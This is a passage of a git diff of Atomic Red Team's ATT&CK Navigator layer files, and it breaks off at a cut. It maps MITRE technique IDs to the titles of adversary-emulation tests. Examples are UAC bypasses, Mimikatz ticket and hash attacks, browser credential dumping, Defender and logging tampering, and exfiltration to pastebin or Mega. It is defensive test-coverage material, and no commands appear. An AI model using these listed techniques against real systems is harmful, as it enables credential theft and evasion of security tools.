Startup Value\n- HKCU - Policy Settings Explorer Run Key\n- HKLM - Policy Settings Explorer Run Key\n- HKLM - Append Command to Winlogon Userinit KEY Value\n- HKLM - Modify default System Shell - Winlogon Shell KEY Value \n- secedit used to create a Run key in the HKLM Hive\n- Modify BootExecute Value\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"comment":"\n- Authentication Package\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"comment":"\n- Create a new time provider\n- Edit an existing time provider\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"comment":"\n- Winlogon Shell Key Persistence - PowerShell\n- Winlogon Userinit Key Persistence - PowerShell\n- Winlogon Notify Key Logon Persistence - PowerShell\n- Winlogon HKLM Shell Key Persistence - PowerShell\n- Winlogon HKLM Userinit Key Persistence - PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"comment":"\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa Security Support Provider configuration in registry\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig Security Support Provider configuration in registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Snake Malware Kernel Driver Comadmin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"comment":"\n- Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"comment":"\n- Shortcut Modification\n- Create shortcut to cmd in startup folders\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"comment":"\n- Add Port Monitor persistence in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"comment":"\n- Print Processors\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"comment":"\n- HKLM - Add atomic_test key to launch executable as part of user setup\n- HKLM - Add malicious StubPath value to existing Active Setup Entry\n- HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":1,"enabled":true,"comment":"\n- Persistence by modifying Windows Terminal profile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"comment":"\n- Bypass UAC using Event Viewer (cmd)\n- Bypass UAC using Event Viewer (PowerShell)\n- Bypass UAC using Fodhelper\n- Bypass UAC using Fodhelper - PowerShell\n- Bypass UAC using ComputerDefaults (PowerShell)\n- Bypass UAC by Mocking Trusted Directories\n- Bypass UAC using sdclt DelegateExecute\n- Disable UAC using reg.exe\n- Bypass UAC using SilentCleanup task\n- UACME Bypass Method 23\n- UACME Bypass Method 31\n- UACME Bypass Method 33\n- UACME Bypass Method 34\n- UACME Bypass Method 39\n- UACME Bypass Method 56\n- UACME Bypass Method 59\n- UACME Bypass Method 61\n- WinPwn - UAC Magic\n- WinPwn - UAC Bypass ccmstp technique\n- WinPwn - UAC Bypass DiskCleanup technique\n- WinPwn - UAC Bypass DccwBypassUAC technique\n- Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key\n- UAC Bypass with WSReset Registry Modification\n- Disable UAC - Switch to the secure desktop when prompting for elevation via registry key\n- Disable UAC notification via registry keys\n- Disable ConsentPromptBehaviorAdmin via registry keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"comment":"\n- Mimikatz Pass the Hash\n- crackmapexec Pass the Hash\n- Invoke-WMIExec Pass the Hash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"comment":"\n- Mimikatz Kerberos Ticket Attack\n- Rubeus Kerberos Pass The Ticket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":8,"enabled":true,"comment":"\n- Extracting passwords with findstr\n- Access unattend.xml\n- WinPwn - sensitivefiles\n- WinPwn - Snaffler\n- WinPwn - powershellsensitive\n- WinPwn - passhunt\n- WinPwn - SessionGopher\n- WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"comment":"\n- Enumeration for Credentials in Registry\n- Enumeration for PuTTY Credentials in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Private Keys\n- ADFS token signing and encryption certificates theft - Local\n- ADFS token signing and encryption certificates theft - Remote\n- CertUtil ExportPFX\n- Export Root Certificate with Export-PFXCertificate\n- Export Root Certificate with Export-Certificate\n- Export Certificates with Mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"comment":"\n- GPP Passwords (findstr)\n- GPP Passwords (Get-GPPPassword)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"comment":"\n- SIP (Subject Interface Package) Hijacking via Custom DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on Windows\n- Install root CA on Windows with certutil\n- Add Root Certificate to CurrentUser Certificate Store\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"comment":"\n- Mount ISO image\n- Mount an ISO image and run executable from the ISO\n- Remove the Zone.Identifier alternate data stream\n- Execute LNK file from ISO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}],"comment":"\n- Extract Windows Credential Manager via VBA\n- Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]\n- Dump credentials from Windows Credential Manager With PowerShell [web Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]\n- WinPwn - Loot local Credentials - lazagne\n- WinPwn - Loot local Credentials - Wifi Credentials\n- WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords\n"},{"techniqueID":"T1555.003","score":14,"enabled":true,"comment":"\n- Run Chrome-password Collector\n- LaZagne - Credentials from Browser\n- Simulating access to Chrome Login Data\n- Simulating access to Opera Login Data\n- Simulating access to Windows Firefox Login Data\n- Simulating access to Windows Edge Login Data\n- Decrypt Mozilla Passwords with Firepwd.py\n- Stage Popular Credential Files for Exfiltration\n- WinPwn - BrowserPwn\n- WinPwn - Loot local Credentials - mimi-kittenz\n- WinPwn - PowerSharpPack - Sharpweb for Browser Credentials\n- WebBrowserPassView - Credentials from Browser\n- BrowserStealer (Chrome / Firefox / Microsoft Edge)\n- Dump Chrome Login Data with esentutl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"comment":"\n- Access Saved Credentials via VaultCmd\n- WinPwn - Loot local Credentials - Invoke-WCMDump\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"comment":"\n- Install and Register Password Filter DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"comment":"\n- LLMNR Poisoning with Inveigh (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"comment":"\n- Crafting Active Directory golden tickets with mimikatz\n- Crafting Active Directory golden tickets with Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"comment":"\n- Crafting Active Directory silver tickets with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"comment":"\n- Request for service tickets\n- Rubeus kerberoast\n- Extract all accounts in use as SPN using setspn\n- Request A Single Ticket via PowerShell\n- Request All Tickets via PowerShell\n- WinPwn - Kerberoasting\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"comment":"\n- Rubeus asreproast\n- Get-DomainUser with PowerView\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}],"comment":"\n- Cobalt Strike Artifact Kit pipe\n- Cobalt Strike Lateral Movement (psexec_psh) pipe\n- Cobalt Strike SSH (postex_ssh) pipe\n- Cobalt Strike post-exploitation pipe (4.2 and later)\n- Cobalt Strike post-exploitation pipe (before 4.2)\n"},{"techniqueID":"T1559.002","score":3,"enabled":true,"comment":"\n- Execute Commands\n- Execute PowerShell script via Word DDE\n- DDEAUTO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}],"comment":"\n- Compress Data for Exfiltration With PowerShell\n"},{"techniqueID":"T1560.001","score":5,"enabled":true,"comment":"\n- Compress Data for Exfiltration With Rar\n- Compress Data and lock with password for Exfiltration with winrar\n- Compress Data and lock with password for Exfiltration with winzip\n- Compress Data and lock with password for Exfiltration with 7zip\n- ESXi - Remove Syslog remote IP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562","score":58,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Windows Disable LSA Protection\n"},{"techniqueID":"T1562.001","score":33,"enabled":true,"comment":"\n- Unload Sysmon Filter Driver\n- Uninstall Sysmon\n- AMSI Bypass - AMSI InitFailed\n- AMSI Bypass - Remove AMSI Provider Reg Key\n- Disable Arbitrary Security Windows Service\n- Tamper with Windows Defender ATP PowerShell\n- Tamper with Windows Defender Command Prompt\n- Tamper with Windows Defender Registry\n- Disable Microsoft Office Security Features\n- Remove Windows Defender Definition Files\n- Stop and Remove Arbitrary Security Windows Service\n- Uninstall Crowdstrike Falcon on Windows\n- Tamper with Windows Defender Evade Scanning -Folder\n- Tamper with Windows Defender Evade Scanning -Extension\n- Tamper with Windows Defender Evade Scanning -Process\n- Disable Windows Defender with DISM\n- Disable Defender Using NirSoft AdvancedRun\n- Kill antimalware protected processes using Backstab\n- WinPwn - Kill the event log services for stealth\n- Tamper with Windows Defender ATP using Aliases - PowerShell\n- LockBit Black - Disable Privacy Settings Experience Using Registry -cmd\n- LockBit Black - Use Registry Editor to turn on automatic logon -cmd\n- LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell\n- Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell\n- Disable Windows Defender with PwSh Disable-WindowsOptionalFeature\n- WMIC Tamper with Windows Defender Evade Scanning Folder\n- Delete Windows Defender Scheduled Tasks\n- Disable Hypervisor-Enforced Code Integrity (HVCI)\n- AMSI Bypass - Override AMSI via COM\n- Tamper with Windows Defender Registry - Reg.exe\n- Tamper with Windows Defender Registry - Powershell\n- Delete Microsoft Defender ASR Rules - InTune\n- Delete Microsoft Defender ASR Rules - GPO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"comment":"\n- Disable Windows IIS HTTP Logging\n- Disable Windows IIS HTTP Logging via PowerShell\n- Kill Event Log Service Threads\n- Impair Windows Audit Log Policy\n- Clear Windows Audit Policy Config\n- Disable Event Logging with wevtutil\n- Makes Eventlog blind with Phant0m\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":10,"enabled":true,"comment":"\n- Disable Microsoft Defender Firewall\n- Disable Microsoft Defender Firewall via Registry\n- Allow SMB and RDP on Microsoft Defender Firewall\n- Opening ports for proxy - HARDRAIN\n- Open a local port through Windows Firewall to any profile\n- Allow Executable Through Firewall Located in Non-Standard Location\n- LockBit Black - Unusual Windows firewall registry modification -cmd\n- LockBit Black - Unusual Windows firewall registry modification -Powershell\n- Blackbit - Disable Windows Firewall using netsh firewall\n- ESXi - Disable Firewall via Esxcli\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":5,"enabled":true,"comment":"\n- Disable Powershell ETW Provider - Windows\n- Disable .NET Event Tracing for Windows Via Registry (cmd)\n- Disable .NET Event Tracing for Windows Via Registry (powershell)\n- LockBit Black - Disable the ETW Provider of Windows Defender -cmd\n- LockBit Black - Disable the ETW Provider of Windows Defender -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"comment":"\n- Safe Mode Boot\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":1,"enabled":true,"comment":"\n- PowerShell Version 2 Downgrade\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"comment":"\n- RDP hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}],"comment":"\n- Extract binary files via VBA\n- Create a Hidden User Called \"$\"\n- Create an \"Administrator \" user (with a space on the end)\n- Create and Hide a Service with sc.exe\n- Command Execution with NirCmd\n"},{"techniqueID":"T1564.001","score":5,"enabled":true,"comment":"\n- Create Windows System File with Attrib\n- Create Windows Hidden File with Attrib\n- Hide Files Through Registry\n- Create Windows Hidden File with powershell\n- Create Windows System File with powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":1,"enabled":true,"comment":"\n- Create Hidden User in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"comment":"\n- Hidden Window\n- Headless Browser Accessing Mockbin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"comment":"\n- Alternate Data Streams (ADS)\n- Store file in Alternate Data Stream (ADS)\n- Create ADS command prompt\n- Create ADS PowerShell\n- Create Hidden Directory via $index_allocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"comment":"\n- Register Portable Virtualbox\n- Create and start VirtualBox virtual machine\n- Create and start Hyper-V virtual machine\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"comment":"\n- Download Macro-Enabled Phishing Attachment\n- Word spawned a command shell and used an IP address in the command line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data with rclone to cloud Storage - Mega (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"comment":"\n- Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":5,"enabled":true,"comment":"\n- Execute a Command as a Service\n- Use PsExec to execute a command on a remote host\n- BlackCat pre-encryption cmds with Lateral Movement\n- Use RemCom to execute a command on a remote host\n- Snake Malware Service Create\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"comment":"\n- Exfiltration Over SMB over QUIC (New-SmbMapping)\n- Exfiltration Over SMB over QUIC (NET USE)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"comment":"\n- DNS over HTTPS Large Query Volume\n- DNS over HTTPS Regular Beaconing\n- DNS over HTTPS Long Domain Query\n- run ngrok\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"comment":"\n- OpenSSL C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"comment":"\n- DLL Search Order Hijacking - amsi.dll\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"comment":"\n- DLL Side-Loading using the Notepad++ GUP.exe binary\n- DLL Side-Loading using the dotnet startup hook environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"comment":"\n- powerShell Persistence via hijacking default modules - Get-Variable.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"comment":"\n- Execution of program.exe as service with unquoted service path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"comment":"\n- Service Registry Permissions Weakness\n- Service ImagePath Change with reg.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"comment":"\n- User scope COR_PROFILER\n- System Scope COR_PROFILER\n- Registry-free process scope COR_PROFILER\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"comment":"\n- Enumerate PlugNPlay Camera\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1614","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":2,"enabled":true,"comment":"\n- Discover System Language by Registry Query\n- Discover System Language with chcp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"comment":"\n- Display group policy information via gpresult\n- Get-DomainGPO to display group policy information via PowerView\n- WinPwn - GPOAudit\n- WinPwn - GPORemoteAccessPolicy\n- MSFT Get-GPO Cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"comment":"\n- WinPwn - Reflectively load Mimik@tz into memory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"comment":"\n- Staging Local Certificates via Export-Certificate\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":2,"enabled":true,"comment":"\n- Get-EventLog To Enumerate Windows Security Log\n- Enumerate Windows Security Log via WevtUtil\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index 0b26e0b412..40c896b57c 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json @@ -1 +1 @@ -{"name":"Atomic Red Team","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":49,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View 